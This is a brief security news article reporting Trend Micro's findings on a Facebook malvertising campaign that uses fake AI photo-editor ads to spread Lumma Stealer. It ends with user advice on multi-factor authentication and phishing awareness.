2ND AUG 2024
A Facebook malvertising campaign has been identified, targeting users searching for AI image editing tools and stealing their credentials by deceiving them into installing counterfeit applications that mimic legitimate software.
The attackers leverage the growing popularity of AI-driven image-generation tools by crafting malicious websites that closely resemble legitimate services, thus luring potential victims into unknowingly infecting themselves with information-stealing malware. This was revealed by Trend Micro researchers who analyzed the campaign.
We take a look at how fake AI ads and the password stealing malware work in concert together to target unsuspecting victims.
The attack begins with phishing messages sent to Facebook page owners or administrators, directing them to fraudulent account protection pages designed to trick them into divulging their login information.
Once the attackers have obtained these credentials, they hijack the victims' accounts, seize control of their pages, and proceed to publish malicious social media posts, which they then promote through paid advertising.
“We uncovered a malvertising campaign involving a threat actor that steals social media pages—typically those related to photography—by changing their names to make them appear connected to popular AI photo editors,” said Jaromir Horejsi, a threat researcher at Trend Micro.
The password stealer malware is a sophisticated piece of code that can take over the target’s system. Here’s how it happens.
“The threat actor then creates malicious posts containing links to fake websites that closely resemble the official sites of legitimate photo editors. To drive traffic to these posts, the perpetrator boosts them through paid ads,” Horejsi added.
When Facebook users click on the URL promoted in the malicious fake AI ad, they are redirected to a fake webpage impersonating legitimate AI photo editing and generation software, where they are prompted to download and install a software package.
However, instead of receiving AI image editing software, the victims inadvertently install the legitimate ITarian remote desktop tool, which is configured to deploy a downloader that automatically installs the Lumma Stealer malware.
This malware silently infiltrates the system, enabling the attackers to collect and exfiltrate sensitive information such as credentials, cryptocurrency wallet files, browser data, and password manager databases.
The stolen data is subsequently sold to other cybercriminals or used by the attackers to compromise the victims' online accounts, steal their funds, and perpetuate further scams.
To guard against fake AI ads on Facebook, here are some recommendations from the Trend Micro expert.
“Users should enable multi-factor authentication (MFA) on all social media accounts to add an extra layer of protection against unauthorized access,” Horejsi advised.
“Organizations should educate their employees on the dangers of phishing attacks and how to recognize suspicious messages and links. Users should always verify the legitimacy of links, particularly those that request personal information or login credentials,” he further emphasized.
Fake AI ads on YouTube are also present, so make sure you don’t click on those too.
